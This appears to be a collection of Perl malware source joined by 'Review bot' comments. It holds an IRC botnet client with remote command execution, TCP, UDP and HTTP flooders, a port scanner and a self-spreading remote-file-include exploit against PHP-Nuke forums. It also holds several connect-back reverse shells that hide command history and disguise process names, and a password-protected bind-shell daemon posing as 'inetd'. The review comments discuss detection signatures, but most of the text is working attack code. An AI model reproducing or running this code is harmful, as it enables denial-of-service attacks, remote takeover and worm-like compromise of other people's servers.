$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick|".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal ddosit");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
}
}
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 HackerMalaysia Versi ".$versi_saya);
}
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for Php-Nuk3 exploit ".$1." seconds.");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url =$path."/modules/Forums/admin/admin_users.php?phpbb_root_path=$boturl?";
$page = http_query($url);
$exploited = $exploited + 1;
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." Php-Nuk3 boxes in ".$1." seconds.");
}
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
#
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",
"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
"vu","vn","ye","yu","cd","zm","zw","");
my @str;
foreach $dom (@dominios)
{
push (@str,"%22modules.php?name%3A%22+%7C+%22+inurl%3Amodules.php%3Fname%3D+site%3A".$dom."%20");
}
my $query="www.google.com/search?q=";
$query.=$str[(rand(scalar(@str)))];
$query.="&num=$n&start=$s";
my @lst=();
my $page = http_query($query);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
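Review bot: This section is a near-verbatim copy of the preceding bot and should say so in a header comment, because the only differences are configuration: `@titi`, `@adms`, `@canais`, `$servidor`, `$porta`, the Google query string built in `fetch`, and the line `$url =$path."/modules/Forums/admin/admin_users.php?phpbb_root_path=$boturl?";` in place of the `com_extcalendar` path used by the other copy. Recording that this variant's spreader probes the `admin_users.php` include path with its own C2 host and channel, rather than reading it as an independent sample, would let an analyst diff only the configuration block. The shared body — `parse`, `bfunc`, `ircase`, `shell`, the flooders and `http_query` — is identical, so any signature written for one copy applies to both.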


@ -0,0 +1,46 @@
# Backdoor - Perl Connect Back Backdoor
# Unpublished/Unreleased Source Code
use Socket;
print "Backdoor ! bypassing Firewalls\n\n";
if (!$ARGV[0]) {
printf "Uso: $0 [Host] <Puerto>\n";
exit(1);
}
print "[*] Espere ...\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Conectando...\n";
$proto = getprotobyname('tcp') || die("[-] Protocolo Desconocido\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[-] Error Socket\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("[-] Imposible Conectar\n");
}
print "[*] Cargando Shell...\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Cargada a joder!\n\n";

@ -0,0 +1,59 @@
use IO::Socket;
#IRAN HACKERS SABOTAGE Connect Back Shell
#code by:LorD
#We Are :LorD-C0d3r-NT
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
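Review bot: The `die print "[-] Unable to Resolve Host\n"` form on the `socket(...)` and `connect(...)` lines never produces those strings as the death message: `print` runs first and writes to the still-local STDOUT, and `die` receives its return value of 1, so the process actually ends with `1 at ... line N` on stderr. For a corpus listing the useful change is a comment rather than code, e.g. `# NOTE: "die print ..." prints the text to stdout, then dies with "1 at ..."; the quoted strings do not appear on stderr` above the `socket(` line, so nobody greps captured stderr for them. The fixed banner `--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--` is printed after STDOUT has been redirected to the socket and before `system($system)`, so it is the first application data on the wire and the sample's most stable network signature; the header's session transcript shows it but does not call that out.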

@ -0,0 +1,18 @@
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
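Review bot: This listing has no header comment at all, and its two masquerade traits are easy to miss in an 18-line script: `$0=$cmd` rewrites the process title to `lynx`, and `$system` sends the output of `uname -a` and `id` down the socket before handing over `/bin/sh`. Suggest a header along the lines of `# connect-back shell: process title rewritten to "lynx", beacons uname/id output, then runs /bin/sh with stdio on the socket` so the title/image mismatch and the fixed first bytes of the connection are recorded for detection. All three `die("Error: $!\n")` paths fire before the `open(STDIN, ">&SOCKET")` redirection, so connection failures surface on the invoking terminal rather than on the remote side.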

@ -0,0 +1,462 @@
# Telnet-like Standard Daemon 0.7
#
# 0ldW0lf - oldwolf@atrixteam.net
# - old-wolf@zipmai.com
# - www.atrix.cjb.net
# - www.atrixteam.net
#
# For those guys that still like to open ports
# and use non-rooted boxes
#
# This has been developed to join in the TocToc
# project code, now it's done and I'm distributing
# this separated
#
# This one i made without IO::Pty so it uses
# only standard modules... enjoy it
#
# tested on linux boxes.. probably will work fine on others
# any problem... #atrix@irc.brasnet.org
#
##########################################################
# ******************* CONFIGURATION ******************** #
##########################################################
my $PORT = $ARGV[0] || 3847; # default port is 3847
my $PASS = 'ouhEUhhJ6RbwE'; # encripted password
my $SHELL = "/bin/bash"; # shell to be executed
my $HOME = "/tmp"; # your HOME
my $PROC = "inetd"; # name of the process
my $PASS_PROMPT = "Password: "; # password prompt
my $WRONG_PASS = "Password Errata!"; # "wrong password" message
my @STTY = ('sane', 'dec'); # stty arguments
##########################################################
# feel free to change the ENV
#### ENVironment ####
$ENV{HOME} = $HOME;
#$ENV{PS1} = '[\u@\h \W]: '; # the way i like :)
# colorful PS1 is also funny :)
$ENV{PS1} = '\[\033[3;36m\][\[\033[3;34m\]\[\033[1m\]\u\[\033[3;36m\]@\[\033[0m\]\[\033[3;34m\]\[\033[1m\]\h \[\033[0m\]\[\033[1m\]\W\[\033[0m\]\[\033[3;36m\]]\[\033[0m\]\[\033[1m:\[\033[0m\] ';
$ENV{MAIL} = '/var/mail/root';
$ENV{PATH} = '/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin';
$ENV{HISTFILE} = '/dev/null';
$ENV{USER} = 'root';
$ENV{LOGNAME} = 'root';
$ENV{LS_OPTIONS} = ' --color=auto -F -b -T 0';
$ENV{LS_COLORS} = 'no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.bz2=01;31:*.rpm=01;31:*.deb=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.mpg=01;37:*.avi=01;37:*.mov=01;37:';
$ENV{SHELL} = $SHELL;
$ENV{TERM} = 'xterm';
#####################
$0=$PROC."\0";
use IO::Socket;
use IO::Select;
use POSIX;
use strict;
# i wouldn't change that
# if i were you
###### SIGnals ######
$SIG{HUP} = 'IGNORE';
$SIG{PS} = 'IGNORE';
$SIG{TERM} = 'IGNORE';
$SIG{CHLD} = sub { wait; };
#####################
# ioctl stuff
my %IOCTLDEF;
$IOCTLDEF{TIOCSWINSZ} = 0x5414;
$IOCTLDEF{TIOCNOTTY} = 0x5422;
$IOCTLDEF{TIOCSCTTY} = 0x540E;
safeload('sys/ttycom.ph', 1); # BSD
safeload('sys/ioctl.ph', 1);
safeload('asm/ioctls.ph', 1);
foreach my $IOCTL (keys(%IOCTLDEF)) {
next if (defined(&{$IOCTL}));
if (open(IOD, "< /usr/include/asm/ioctls.h")) { # linux
while(<IOD>) {
if (/^\#define\s+$IOCTL\s+(.*?)\n$/) {
eval "sub $IOCTL () {$1;}";
last;
}
}
close(IOD);
}
# i realy dunno if i can do that.. but.. here it goes
eval "sub $IOCTL () { $IOCTLDEF{$IOCTL};}" unless (defined(&{$IOCTL}));
}
# starting...
$PORT = $ARGV[0] if ($ARGV[0]);
chdir('/');
no strict 'refs';
my $bindfd = *{'bind_sock'};
*{$bindfd}= IO::Socket::INET->new(Listen => 1, LocalPort => $PORT, Proto => "tcp") || die "could not listen on port $PORT: $!";
my $bind = \*{$bindfd};
my $pid = fork();
die "ERROR: I could not fork() the process." unless defined($pid);
exit if $pid;
my %CLIENT;
my $sel_serv = IO::Select->new($bind);
my $sel_shell = IO::Select->new();
# main loop...
while ( 1 ) {
select(undef,undef,undef, 0.3) if (scalar(keys(%CLIENT)) == 0);
read_clients();
read_shells();
}
sub read_clients {
map { read_client($_) } ($sel_serv->can_read(0.01));
}
sub read_client {
my $fh = shift;
if ($fh eq $bind) {
my $newcon = $bind->accept;
$sel_serv->add($newcon);
$CLIENT{$newcon}->{senha} = 0;
$CLIENT{$newcon}->{sock} = $newcon;
$fh->autoflush(1);
do_client($newcon, '3', '5', '1');
sleep(1);
write_client($newcon, $PASS_PROMPT) if ($PASS_PROMPT);
} else {
my $msg;
my $nread = sysread($fh, $msg, 1024);
if ($nread == 0) {
close_client($fh);
} else {
telnet_parse($fh, $msg);
}
}
}
sub read_shells {
map { read_shell($_) } ($sel_shell->can_read(0.01));
}
sub telnet_parse {
my ($cli, $msg) = @_;
my $char = (split('', $msg))[0];
if (ord($char) == 255) {
chr_parse($cli, $msg);
} else {
if ($CLIENT{$cli}->{senha} == 0) {
$CLIENT{$cli}->{buf} .= $msg;
return() unless ($msg =~ /\r|\n/);
my $pass = $CLIENT{$cli}->{buf};
$CLIENT{$cli}->{buf} = '';
$pass =~ s/\n//g;
$pass =~ s/\0//g;
$pass =~ s/\r//g;
if (crypt($pass, $PASS) ne $PASS) {
finish_client($cli, "\r\n\r".$WRONG_PASS."\r\n\r");
} else {
$CLIENT{$cli}->{senha} = 1;
write_client($cli, chr(255).chr(253).chr(31));
write_client($cli, "\r\n\r\r\n\r");
new_shell($cli);
}
return();
}
$msg =~ s/\r\n\0\0//g;
$msg =~ s/\0//g;
$msg =~ s/\r\n/\n/g;
write_shell($cli, $msg);
}
}
sub read_shell {
my $shell = shift;
my $cli;
map { $cli = $CLIENT{$_}->{sock} if ($CLIENT{$_}->{shell} eq $shell) } keys(%CLIENT);
my $msg;
my $nread = sysread($shell, $msg, 1024);
if ($nread == 0) {
finish_client($cli, "Terminal closed.\r\n\r");
} else {
write_client($cli, $msg);
}
}
sub to_chr {
my $chrs = '';
map { $chrs .= chr($_) } (split(/ +/, shift));
return($chrs);
}
sub do_client {
my ($client, @codes) = @_;
map { write_client($client, chr(255).chr(251).chr($_)) } @codes;
}
sub chr_parse {
my ($client, $chrs) = @_;
my $ords = '';
map { $ords .= ord($_).' ' } (split(//, $chrs));
my $msg = '';
if ($ords =~ /255 250 31 (\d+) (\d+) (\d+) (\d+)/) {
my $winsize = pack('C4', $4, $3, $2, $1);
ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);# || die "erro: $!";
}
foreach my $code (split("255 ", $ords)) {
if ($code =~ /(\d+) (.*)$/) {
my $codes = $2;
if ($1 == 251) {
# do whatever you want dude ehehe
$msg .= chr(255).chr(253);
map { $msg .= chr($_) } (split(/ +/, $codes));
}
}
}
write_client($client, $msg) if ($msg);
return(1);
}
sub new_shell {
my $cli = shift;
POSIX::setpgid(0, 0);
my ($tty, $pty);
unless (($tty, $pty) = open_tty($cli)) {
finish_client($cli, "ERROR: No more pty´s avaliable\n");
return(undef);
}
my $pid = fork();
if (not defined($pid)) {
finish_client($cli, "ERROR: fork()\n");
return(undef);
}
unless($pid) {
close($pty);
local(*DEVTTY);
if (open (DEVTTY, "/dev/tty")) {
ioctl(DEVTTY, &TIOCNOTTY, 0 );# || die "erro: $!";
close(DEVTTY);
}
POSIX::setsid();
ioctl($tty, &TIOCSCTTY, 0);# || die "erro: $!";
open (STDIN, "<&".fileno($tty)) || die "I could not reopen STDIN: $!";
open (STDOUT, ">&".fileno($tty)) || die "I could not reopen STDOUT: $!";
open (STDERR, ">&".fileno($tty)) || die "I could not reopen STDERR: $!";
close($tty);
sleep(1);
foreach my $stty ("/bin/stty", "/usr/bin/stty") {
next unless (-x $stty);
map { system("$stty", $_) } @STTY;
}
chdir("$HOME");
{ exec("$SHELL") };
syswrite(STDOUT, "\n\nERROR: exec($SHELL)\n\nI could not execute the shell ($SHELL)\nHowever you are lucky :P\nYou can use the \"I'm FUCKED!\" mode and fix up this thing...\nTip: Find some shell and execute it ;)\n\n");
syswrite(STDOUT, "\n\nOK! I'm Fucked mode.\n");
syswrite(STDOUT, "Type ^C to exit\n\nI'm FuCKeD!# ");
while (my $msg = <STDIN>) {
$msg =~ s/\n$//;
$msg =~ s/\r$//;
if ($msg =~ /^\s*cd\s+(\S+)/) {
my $notf = "directory $1 not found!\n";
chdir($1) || syswrite(STDOUT, $notf, length($notf));
} else {
system("$msg 2>&1");
}
syswrite(STDOUT, "I'm FuCKeD!# ");
}
exit;
}
close($tty);
select($pty); $| = 1;
select(STDOUT);
set_raw($pty);
$CLIENT{$cli}->{shell} = $pty;
$sel_shell->add($pty);
return(1);
}
# Funciton set_raw() stolen from IO::Pty
sub set_raw($) {
my $self = shift;
return 1 if not POSIX::isatty($self);
my $ttyno = fileno($self);
my $termios = new POSIX::Termios;
unless ($termios) {
# warn "set_raw: new POSIX::Termios failed: $!";
return undef;
}
unless ($termios->getattr($ttyno)) {
# warn "set_raw: getattr($ttyno) failed: $!";
return undef;
}
$termios->setiflag(0);
$termios->setoflag(0);
$termios->setlflag(0);
$termios->setcc(&POSIX::VMIN, 1);
$termios->setcc(&POSIX::VTIME, 0);
unless ($termios->setattr($ttyno, &POSIX::TCSANOW)) {
# warn "set_raw: setattr($ttyno) failed: $!";
return undef;
}
return 1;
}
sub open_tty {
no strict;
my $cli = shift;
my ($PTY, $TTY) = (*{"pty.$cli"}, *{"tty.$cli"}); # believe me old versions :/
for (my $i = 0; $i < 256; $i++) {
my $pty = get_tty($i, "/dev/pty");
next unless (open($PTY, "+> $pty"));
my $tty = get_tty($i, "/dev/tty");
unless(open($TTY, "+> $tty")) {
close($PTY);
next;
}
return($TTY, $PTY);
}
return();
}
sub get_tty {
my ($num, $base) = @_;
my @series = ('p' .. 'z', 'a' .. 'e');
my @subs = ('0' .. '9', 'a' .. 'f');
my $buf = $base;
